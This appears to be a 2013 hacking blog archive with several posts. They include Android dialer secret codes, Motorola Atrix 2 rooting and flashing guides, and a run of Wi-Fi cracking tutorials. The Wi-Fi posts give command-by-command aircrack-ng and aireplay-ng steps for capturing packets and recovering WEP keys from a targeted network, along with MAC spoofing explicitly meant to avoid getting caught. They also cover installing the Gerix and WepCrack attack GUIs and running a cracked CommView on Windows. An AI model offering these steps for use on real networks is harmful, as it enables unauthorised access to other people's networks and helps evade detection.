Sunday 3 March 2013

Android Hacked to get Secret Codes


Please note: Some codes mentioned here will not work on some roms.


*#*#4636#*#* - Phone / Battery / USage information
*#*#7780#*#* - factory data reset
*2767*3855# - factory format
*#*#34971539#*#* - information about phone camera
*#*#7594#*#* - End Call / Power
*#*#273283*255*663282*#*#* - File copy / backup
*#*#197328640#*#* - Service mode.

WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)
*#*#232338#*#* - Shows WiFi MAC address
*#*#1472365#*#* - GPS test
*#*#1575#*#* - Another GPS test
*#*#232331#*#* - Bluetooth test
*#*#232337#*# - Shows Bluetooth device address
*#*#8255#*#* - This code can be used to launch GTalk Service Monitor.

GET FIRMWARE VERSION INFORMATION:

*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate
*#*#1234#*#* - PDA and Phone
*#*#1111#*#* - FTA SW Version
*#*#2222#*#* - FTA HW Version
*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

CODES TO LAUNCH VARIOUS FACTORY TESTS:

*#*#0283#*#* - Packet Loopback
*#*#0*#*#* - LCD test
*#*#0673#*#* OR *#*#0289#*#* - Melody test
*#*#0842#*#* - Device test (Vibration test and BackLight test)
*#*#2663#*#* - Touch screen version
*#*#2664#*#* - Touch screen test
*#*#0588#*#* - Proximity sensor test
*#*#3264#*#* - RAM version
Have fun with these secrets codes .....:)

Tuesday 26 February 2013

Hack Wifi using Backtrack


Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.
SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
  • ifconfig
This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
  • airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
  • airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
  • macchanger –mac [Desired MAC address] [Wi-Fi card name]
this command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
  • airmon-ng start [Wi-Fi Card name]
You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears
DUMPING PACKETS
Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -
  • airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
  • airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.
SPEEDING UP THINGS
However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it
airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension]  Revealing the WEP Key - rdhacker.blogspot.com
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
Now just login using the WEP key you got.

Cheers

Install Gerix Wifi Crackrer Ubuntu

SEE ALTERNATE WAY HERE

Install Gerix Wifi Crackrer Ubuntu


Here we are to present the new version of Gerix Wifi Cracker NG (New Generation), a really complete GUI for Aircrack-NG which includes useful extras.
Completely re-written in Python + QT, automates all the different techniques to attack Access Points and Wireless Routers (but not only ..)

Currently Gerix Wifi Cracker NG is available and supported natively by BackTrack (pre-installed on the BT4 Final version) and available on all the different Debian Based distributions (Ubuntu, ecc..).
The software requires: aircrack-ngxtermmachchangerzenity and obviously python-qt3. The version 1.0 is publicly released for the last tests and to collect opinions from users.

To install, open terminal and type
wget http://www.clshack.it/nopaste/gerix-wifi-cracker-ng-2.0-bt7.deb
sudo dpkg -i gerix-wifi-cracker-ng-2.0-bt7.deb 
If cannot install then creates the directory
mkdir / pentest / wireless / wifi-gerix-cracker-ng
 Well, once installed, can open it from here:
sudo python /usr/share/gerix-wifi-cracker-ng/gerix.py
or
sudo python /pentest/wireless/gerix-wifi-cracker-ng/gerix.py

Thursday 21 February 2013

Wifi Hacking Ubuntu linux

SEE EASIER AND FASTER VERSION HERE
Lets look at an interesting and 100% functional graphic extension for WEP/WPA crack pack of applications, aicrack-ng (airodump-ng, aireplay-ng, aircrack-ng). The application was tested in the reality, in the operating system Ubuntu 10.04 LTS Lucid Lynx. USB WiFi card used for the test is Alfa AWUS050NH.  The used driver is the original part of  Ubuntu Linux (rt2800USB). Besides the pack aircrack-ng and MDK3 there are specified for the error free functioning mentioned dependances: gtk-sharp2, libncurses5-dev, monodevelop, libqyoto4.5-cil, qyoto-dev.
The truth is that the own test (about which you are now reading) worked perfectly even without above mentioned libraries and packets..So the process.. firts of all (if its not already in your operating system) install aircrack-ng (by the help of apt-get or aptitude)
sudo apt-get install aircrack-ng
Dependance installation
sudo apt-get install libncurses5-dev
sudo apt-get install monodevelop
sudo apt-get install gtk-sharp2
sudo apt-get install libqyoto4.5-cil
sudo apt-get install qyoto-dev
The programme itself (link for its download at the end of the text) just unpack from the archive, allocate rights chmod 777 ./program and start up by command ./program.. But first lets look how does the application work in the reality..
After the start of GUI interface there is available in the panel Monitor besides the start the mode monitor and also the menu for security specification, scann lockout on a specific channel and even injection test.  The list of available wireless networks with executed packet injection
The next screenshot – panel Monitor with already specific wireless network on which we are going to test the WEP key crack.
We will skip the panel Authentication (well known thing without problems) and we can see the panel Attack. This panel specifies 4 most frequented attacka.. Broadcast, ArpReplay, ChopChop and Fragmentation attack. The biggest joke is that these mentioned attacks can be runned in parallel. ArpReplay attack worked in our situation the best.
PTW in aircrack-ng managed with approx. 35 000 iv’s. Even less might work but I felt asleep at the PC :)
The programme can be easily configurated and has many clever things.  If you have installed programme MDK3  in your Ubuntu you can use the menu Discover SSID.
Thanks to this clever aid you can find out the hidden SSID access point. Be carreful, the bruteforce mode might  flood all wireless networks within the grasp of your wifi card!
If something is not working modify your configuration according to the attached screenshot menu Option or join the discussion in Forum. Especially at aireplay-ng there is a different possibility in the basic setting..
You can get the application from this link Download  (click on download end, folder wep-wpa-pentest file WepCrack-Ubuntu) or at sourceforge.net. The dependances can be installed directly from Ubuntu repository by the command line or by GUI interface Synaptic.
Tested wifi card Alfa AWUS050NH was used just because of curiosity and approved itself. The programme will work at all wifi cards that OS Ubuntu will detect.
WepCrack will be installed directly in the newly prepared pentest linux distribution based on your donation. The donation is used to buy hardware that is used for tests and articles that you read at your favourite portal (AMP Sec). Check out the portal for FPGA testing & hash tables for WPA pentesting..
For Remote Security writed by K8, edited by AMP SEC.

Wednesday 20 February 2013

WEP wifi hack windows vista/7/8

You will need:
  • windows 7
  • compatible wireless card
  • wep hack files from - Download Here
Data Gathering
1. Install commview: go to the commview folder in the package and double click setup, follow the install nothing special but once done it will fail saying it's not compatible with vista, ignore that.

2. take the crack file and place it in C:\program files\commviewwifi\ (or program files86 if you have 64 bit windows), it will say something about overwriting accept it.

3. Next right click the file cv.exe and click properties, compatabilities and select windows xp sp3 and run as administrator.

4. run it, now if you can click the play button your drivers work your lucky and can skip to number 7

5. otherwise you can close the program and right click computer, manage. go to Device Manager and find your wireless card that you are using (under network adapters) now right click and Update driver software...

6. Browse, Let me pick, Have Disk, Browse
Locate the pack included and go to Driver or NewDrivers (one should work for new as there's different versions [thanks logan perkins]), ok it and see if it finds your drivers
If successful open the CV.exe again and you should see the play button highlighted it worked and you can continue

7. click it and select Scan find the network you are targeting and begin the capture
Note make sure to check the logs to autosave and increase the size to 1000Mb and 100mb per log
They will be located under the program files directory of commview, LOGS

Cracking
It can take 4-8 hours of gathering packets (might be less or more depending on how lucky/unlucky you are - Time varies with signal strength. it can take upto 20-24 hours), once done you can continue to crack the data to gain the passphrase shared wep key:

8. Open the logs with commview, file, export, Tcpdump files (*.cap) save whatever name you like

9. Go to the pack, aircrack, Aircrack-ng GUI.exe, browse to the files, choose 64 (or leave at 128 if determined it) and launch

10. wait for the loading and press 1 and enter, the cracking begins and when done you should get the key.

Sunday 17 February 2013

How to root atrix 2 running 4.1.2 official leak

How to root atrix 2 running 4.1.2 official leak using One Click Root Method for Jelly Bean 4.1.2


1) 4.1.2 official Moto leak (by Wanggjghost) - http://forum.xda-developers.com/show....php?t=2092107

2) Root method for above (by answersamir) - http://forum.xda-developers.com/show....php?t=2093923

3) Guide & Review of above (by answersamir) - http://forum.xda-developers.com/show....php?t=2093154

What - This is a "One Click Root" Method as reported worked successfully by a forum member in particular for Leak 1 of JB 4.1.2 by Wangg (don't know if it works for leak 2)

Where - See these two links :
Info link - http://bbs.angeeks.com/forum.php?mod...2%BB%BC%FCROOT

Download link - http://www.baidupcs.com/file/b05cf2f17f4e880119a37851aa468100?fid=3926112336-250528-2018908650&time=1361161989&sign=FDTA-DCb740ccc5511e5e8fedcff06b081203-PVbl1zOzxyN29asV10qlO6hADPk%3D&expires=8h&sh=1&response-cache-control=private

How to root - Just double click the 双击我RunRoot+SUPERSU.bat file and wait for things to happen. (双击我 - translates as double click me)

Many users have confirmed root using this file including me but use this on your own risk

How to flash your Motorola Atrix 2 to Official Jelly Bean update

see this post on how to root on jb - click here
This video will show you how to flash your Motorola Atrix 2 to Official Jelly Bean.



This will only works for Asian MB865 and ME865,Not for At&t MB865 (it may brick your phone).

You can flash this on 2.3.6 or 4.0.4 Based,Or you have a custom rom installed like (Paranoid Android,CyanogenMod 10,Supercharged Rom or MIUI or other)

The GOOD Things in the Official Jellybean 4.1.2:
-Transparent Status Bar
-6GB usable internal memory
-CPU clocked at 1GHz (1000MHz)
-Working Camera,Front Camera,Facelock
-etc...

IMPORTANT:
Fully Charged your Atrix 2 before flashing.
Connect your phone to PC using USB cable in AP Fastboot mode.
Have a RSDlite installed PC,if you don't have you can download it right here
http://forum.xda-developers.com/showt...

Official 4.1.2 Jellybean Fastboot files:
http://pan.baidu.com/share/link?share...

Original thread : xda
http://forum.xda-developers.com/showt...

How to root:
http://forum.xda-developers.com/showt...

I have not test yet if can go back to Gingerbread or ICS after flash Official Jellybean,but i think you will not go back to ICS or Gingerbread because the Jellybean is AWESOME!